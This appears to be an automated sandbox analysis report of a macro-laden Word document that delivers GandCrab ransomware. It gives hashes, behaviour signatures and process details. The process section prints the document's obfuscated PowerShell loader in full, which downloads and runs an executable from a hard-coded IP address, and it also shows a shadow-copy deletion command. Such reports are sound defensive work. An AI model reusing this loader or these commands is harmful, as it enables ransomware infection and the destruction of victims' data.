General Info

File name

Emergеnсyexitmар.doc

Full analysis
https://app.any.run/tasks/9dadd907-118c-4dea-ad5c-b3ded1ba2281
Verdict
Malicious activity
Threats:

GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost.

Analysis date
1/31/2019, 12:39:23
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

macros

macros-on-open

loader

ransomware

gandcrab

trojan

Indicators:

MIME:
application/msword
File info:
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: admin, Template: Normal.dotm, Last Saved By: Admin, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Mon Jan 28 15:47:00 2019, Last Saved Time/Date: Mon Jan 28 15:48:00 2019, Number of Pages: 1, Number of Words: 11, Number of Characters: 66, Security: 0
MD5

52dcbd94c557ae6431bb22c133c7ab40

SHA1

ec1b71981fae120e5d531288880facf8d40b092d

SHA256

a02894f2828618e5683d32c94350079cac6deabe3112f1a38f013086381e4395

SSDEEP

384:gjzCFiSAoKXMVkGPEmRbpMJ8tcEEdi6O091cdjh8xrSFSX8Se0jrai1:arMVkDMbpgdi6l1jxrSFSX6oN

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
120 seconds
Additional time used
none
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Who has a link
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Changes settings of System certificates
  • putty.exe (PID: 3020)
Deletes shadow copies
  • putty.exe (PID: 3020)
Renames files like Ransomware
  • putty.exe (PID: 3020)
Connects to CnC server
  • putty.exe (PID: 3020)
Writes file to Word startup folder
  • putty.exe (PID: 3020)
Dropped file may contain instructions of ransomware
  • putty.exe (PID: 3020)
Unusual execution from Microsoft Office
  • WINWORD.EXE (PID: 3008)
Application was dropped or rewritten from another process
  • putty.exe (PID: 3020)
Downloads executable files from IP
  • powershell.exe (PID: 2292)
GandCrab keys found
  • putty.exe (PID: 3020)
Starts CMD.EXE for commands execution
  • WINWORD.EXE (PID: 3008)
Downloads executable files from the Internet
  • powershell.exe (PID: 2292)
Actions looks like stealing of personal data
  • putty.exe (PID: 3020)
Adds / modifies Windows certificates
  • putty.exe (PID: 3020)
Creates files like Ransomware instruction
  • putty.exe (PID: 3020)
Reads the cookies of Mozilla Firefox
  • putty.exe (PID: 3020)
Executable content was dropped or overwritten
  • powershell.exe (PID: 2292)
Creates files in the Windows directory
  • powershell.exe (PID: 2292)
Creates files in the program directory
  • putty.exe (PID: 3020)
Creates files in the user directory
  • powershell.exe (PID: 2292)
  • putty.exe (PID: 3020)
Executes PowerShell scripts
  • cmd.exe (PID: 3652)
Dropped object may contain TOR URL's
  • putty.exe (PID: 3020)
Creates files in the user directory
  • WINWORD.EXE (PID: 3008)
Reads Microsoft Office registry keys
  • WINWORD.EXE (PID: 3008)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.doc
|   Microsoft Word document (54.2%)
.doc
|   Microsoft Word document (old ver.) (32.2%)
EXIF
FlashPix
Title:
null
Subject:
null
Author:
admin
Keywords:
null
Template:
Normal.dotm
LastModifiedBy:
Admin
RevisionNumber:
4
Software:
Microsoft Office Word
TotalEditTime:
1.0 minutes
CreateDate:
2019:01:28 15:47:00
ModifyDate:
2019:01:28 15:48:00
Pages:
1
Words:
11
Characters:
66
Security:
None
CodePage:
Windows Cyrillic
Company:
Salve
Lines:
1
Paragraphs:
1
CharCountWithSpaces:
76
AppVersion:
16
ScaleCrop:
No
LinksUpToDate:
No
SharedDoc:
No
HyperlinksChanged:
No
TitleOfParts:
null
HeadingPairs
null
null
CompObjUserTypeLen:
32
CompObjUserType:
???????? Microsoft Word 97-2003

Video and screenshots

Processes

Total processes
43
Monitored processes
7
Malicious processes
4
Suspicious processes
0

Behavior graph

+
start download and start winword.exe no specs cmd.exe no specs powershell.exe #GANDCRAB putty.exe wmic.exe vssvc.exe no specs notepad.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3008
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Emergеnсyexitmар.doc"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\winspool.drv
c:\windows\system32\shell32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\program files\microsoft office\office14\gkword.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\fm20.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\fm20enu.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\program files\microsoft office\office14\msproof7.dll
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll

PID
3652
CMD
c:\\windows\\system32\\cmd /c powershell $Rq6Er7D = '57087.66373351$D54cvV70T = 57087.66373351n57087.66373351e57087.66373351w57087.66373351-obj57087.66373351e57087.66373351c57087.66373351t n57087.66373351e57087.66373351t57087.66373351.w57087.66373351e57087.66373351b57087.66373351cli57087.66373351ent; $D54cvV70T.d57087.66373351o57087.66373351w57087.66373351n57087.66373351l57087.66373351o57087.66373351a57087.66373351d57087.66373351f57087.66373351i57087.66373351le(\"57087.66373351h57087.66373351t57087.66373351t57087.66373351p57087.66373351://209.141.56.224/youwin.exe\", \"c:\win57087.66373351dows\t57087.66373351emp\put57087.66373351t57087.66373351y57087.66373351.57087.66373351e57087.66373351x57087.66373351e\"); 57087.66373351s57087.66373351tar57087.66373351t-p57087.66373351r57087.66373351o57087.66373351ces57087.66373351s \"c:\win57087.66373351d57087.66373351o57087.66373351ws\temp\p57087.66373351u57087.66373351t57087.66373351t57087.66373351y.ex57087.66373351e\";'.replace('57087.66373351', $A3XhdAMlf);$iAxsKO45P = '';iex($Rq6Er7D);
Path
c:\windows\system32\cmd.exe
Indicators
No indicators
Parent process
WINWORD.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
2292
CMD
powershell $Rq6Er7D = '57087.66373351$D54cvV70T = 57087.66373351n57087.66373351e57087.66373351w57087.66373351-obj57087.66373351e57087.66373351c57087.66373351t n57087.66373351e57087.66373351t57087.66373351.w57087.66373351e57087.66373351b57087.66373351cli57087.66373351ent; $D54cvV70T.d57087.66373351o57087.66373351w57087.66373351n57087.66373351l57087.66373351o57087.66373351a57087.66373351d57087.66373351f57087.66373351i57087.66373351le(\"57087.66373351h57087.66373351t57087.66373351t57087.66373351p57087.66373351://209.141.56.224/youwin.exe\", \"c:\win57087.66373351dows\t57087.66373351emp\put57087.66373351t57087.66373351y57087.66373351.57087.66373351e57087.66373351x57087.66373351e\"); 57087.66373351s57087.66373351tar57087.66373351t-p57087.66373351r57087.66373351o57087.66373351ces57087.66373351s \"c:\win57087.66373351d57087.66373351o57087.66373351ws\temp\p57087.66373351u57087.66373351t57087.66373351t57087.66373351y.ex57087.66373351e\";'.replace('57087.66373351', $A3XhdAMlf);$iAxsKO45P = '';iex($Rq6Er7D);
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\temp\putty.exe
c:\windows\system32\netutils.dll

PID
3020
CMD
"C:\windows\temp\putty.exe"
Path
C:\windows\temp\putty.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
United Technologies
Description
Winword Twainambient Hagd 'computer Diagnose
Version
Modules
Image
c:\windows\temp\putty.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\opengl32.dll
c:\windows\system32\glu32.dll
c:\windows\system32\ddraw.dll
c:\windows\system32\dciman32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\avifil32.dll
c:\windows\system32\winmm.dll
c:\windows\system32\msacm32.dll
c:\windows\system32\msvfw32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\psapi.dll
c:\windows\system32\ntkrnlpa.exe
c:\windows\system32\kbdus.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\netprofm.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\credssp.dll
c:\windows\system32\secur32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll

PID
2408
CMD
"C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
Path
C:\Windows\system32\wbem\wmic.exe
Indicators
Parent process
putty.exe
User
SYSTEM
Integrity Level
SYSTEM
Exit code
0
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
3536
CMD
C:\Windows\system32\vssvc.exe
Path
C:\Windows\system32\vssvc.exe
Indicators
No indicators
Parent process
––
User
SYSTEM
Integrity Level
SYSTEM
Version:
Company
Microsoft Corporation
Description
Microsoft® Volume Shadow Copy Service
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\vssvc.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\atl.dll
c:\windows\system32\ole32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\vssapi.dll
c:\windows\system32\vsstrace.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\clusapi.dll
c:\windows\system32\cryptdll.dll
c:\windows\system32\xolehlp.dll
c:\windows\system32\version.dll
c:\windows\system32\resutils.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\authz.dll
c:\windows\system32\virtdisk.dll
c:\windows\system32\fltlib.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\vss_ps.dll
c:\windows\system32\samlib.dll
c:\windows\system32\es.dll
c:\windows\system32\propsys.dll
c:\windows\system32\catsrvut.dll
c:\windows\system32\mfcsubs.dll

PID
1300
CMD
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\YHZSNONEU-DECRYPT.txt
Path
C:\Windows\system32\NOTEPAD.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Notepad
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\notepad.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\winspool.drv
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\uxtheme.dll

Registry activity

Total events
1398
Read events
897
Write events
500
Delete events
1

Modification events

PID
Process
Operation
